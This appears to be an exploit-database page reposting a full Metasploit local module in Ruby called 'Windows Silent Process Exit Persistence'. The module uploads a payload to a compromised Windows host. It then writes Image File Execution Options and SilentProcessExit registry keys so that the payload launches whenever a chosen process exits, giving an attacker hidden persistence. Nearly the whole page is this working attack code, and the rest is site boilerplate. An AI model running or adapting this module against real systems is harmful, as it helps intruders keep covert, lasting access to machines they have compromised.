Microsoft Windows Silent Process Exit Persistence

2019.10.05
Credit: bwatters-r7
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/post/file' require 'msf/core/exploit/exe' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Windows::Registry include Msf::Post::File include Msf::Exploit::EXE include Msf::Post::Windows::Priv def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Silent Process Exit Persistence', 'Description' => %q( Windows allows you to set up a debug process when a process exits. This module uploads a payload and declares that it is the debug process to launch when a specified process exits. ), 'License' => MSF_LICENSE, 'Author' => [ 'Mithun Shanbhag', # earliest author found 'bwatters-r7', # msf module ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter', 'shell' ], 'Targets' => [ [ 'Automatic', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => "Jun 28 2008", 'References' => [ ['URL', 'https://attack.mitre.org/techniques/T1183/'], ['URL', 'https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/'] ], 'DefaultOptions' => { 'DisablePayloadHandler' => 'true' } )) register_options([ OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]), OptString.new('PATH', [false, 'Path to write payload(%TEMP% by default).', nil]), OptString.new('IMAGE_FILE', [true, 'Binary to "debug"', nil]) ]) end def upload_payload(dest_pathname) payload_exe = generate_payload_exe write_file(dest_pathname, payload_exe) vprint_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{dest_pathname}") end def validate_active_host unless is_system? fail_with(Failure::NoAccess, "You must be System to run this Module") end begin print_status("Attempting Persistence on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") rescue Rex::Post::Meterpreter::RequestError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") raise Msf::Exploit::Failed, 'Could not connect to session' end end def write_reg_keys(image_file, payload_pathname) reg_keys = [] reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{image_file}", value_name: "GlobalFlag", type: "REG_DWORD", value_value: 512) reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}", value_name: "ReportingMode", type: "REG_DWORD", value_value: 1) reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}", value_name: "MonitorProcess", type: "REG_SZ", value_value: payload_pathname) silent_process_exit_key = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit" registry_createkey(silent_process_exit_key) unless registry_key_exist?(silent_process_exit_key) reg_keys.each do |key| registry_createkey(key[:key_name]) unless registry_key_exist?(key[:key_name]) vprint_status("Writing #{key[:value_name]} to #{key[:key_name]}") registry_setvaldata(key[:key_name], key[:value_name], key[:value_value], key[:type]) unless registry_getvalinfo(key[:key_name], key[:value_name]) print_error("Failed to set #{key[:value_name]} for #{key[:key_name]}") return false end end end def exploit validate_active_host payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP') image_file = datastore['IMAGE_FILE'] payload_pathname = temp_path + "\\" + payload_name + '.exe' vprint_status("Payload pathname = #{payload_pathname}") upload_payload(payload_pathname) if write_reg_keys(image_file, payload_pathname) end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top